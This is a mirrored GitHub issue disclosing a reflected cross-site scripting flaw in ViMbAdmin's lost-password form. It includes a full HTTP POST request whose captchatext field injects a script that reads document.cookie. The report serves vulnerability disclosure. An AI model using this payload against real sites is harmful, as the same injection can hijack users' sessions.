[GH-ISSUE #253] Cross Site Scripting at /auth/lost-password #202

New issue

Closed

opened 2026-02-26 09:36:42 +03:00 by kerem · 0 comments

kerem commented 2026-02-26 09:36:42 +03:00

Owner

Copy link

Originally created by @kendyhikaru on GitHub (Sep 20, 2018).
Original GitHub issue: https://github.com/opensolutions/ViMbAdmin/issues/253

Lost Password had vulnerability, if parameter captchatext longer than 10 characters, application with print out. Attacker can inject javascript in to captchatext parameter with more than 10 characters to exploit Cross Site Scripting. This is POST message:

POST /demo/auth/lost-password HTTP/1.1
Host: www.vimbadmin.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.vimbadmin.net/demo/auth/lost-password
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Cookie: VIMBADMIN3=1e7567b5q3qvs2aa22bm95tms2
Connection: close
Upgrade-Insecure-Requests: 1

username=tretre&captchaid=30678101145165238eb8d978f34fd00b&requestnewimage=0&captchatext=ererterffffffffff"&login=Reset+Password

After submit, javascript will run on browser:

Originally created by @kendyhikaru on GitHub (Sep 20, 2018). Original GitHub issue: https://github.com/opensolutions/ViMbAdmin/issues/253 Lost Password had vulnerability, if parameter captchatext longer than 10 characters, application with print out. Attacker can inject javascript in to captchatext parameter with more than 10 characters to exploit Cross Site Scripting. This is POST message: > POST /demo/auth/lost-password HTTP/1.1 Host: www.vimbadmin.net User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://www.vimbadmin.net/demo/auth/lost-password Content-Type: application/x-www-form-urlencoded Content-Length: 167 Cookie: VIMBADMIN3=1e7567b5q3qvs2aa22bm95tms2 Connection: close Upgrade-Insecure-Requests: 1 > username=tretre&captchaid=30678101145165238eb8d978f34fd00b&requestnewimage=0&captchatext=ererterffffffffff"<script>alert(document.cookie)</script>&login=Reset+Password After submit, javascript will run on browser: 

kerem closed this issue 2026-02-26 09:36:42 +03:00

Sign in to join this conversation.

No Branch/Tag specified

Branches Tags

master

dependabot/composer/smarty/smarty-4.3.1

v2

3.4.1

3.4.0

3.3.0

3.2.1

3.2.0

3.1.1

3.1.0

3.0.15

3.0.14

3.0.13

3.0.12

3.0.11

2.2.4

3.0.10

3.0.9

3.0.8

3.0.7

3.0.6

3.0.5

3.0.4

3.0.3

3.0.2

3.0.1

3.0.0

2.2.3

2.2.2

2.2.1

2.2.0

2.1.0

2.0.8

2.0.7

2.0.6

2.0.5

2.0.4

2.0.3

2.0.2

2.0.1

2.0.0

0.3.4

0.3.3

0.3.2

0.3.1

0.3

Labels

Clear labels   

bug

  

feature

  

feature

  

improvement

  

improvement

  

pull-request

Mirrored from GitHub Pull Request

No labels

bug

feature

feature

improvement

improvement

pull-request

Milestone

Clear milestone

No items

No milestone

Projects

Clear projects

No items

No project

Assignees

Clear assignees

No assignees

1 participant

Notifications

Subscribe

Due date

The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference

starred/ViMbAdmin-opensolutions#202

No description provided.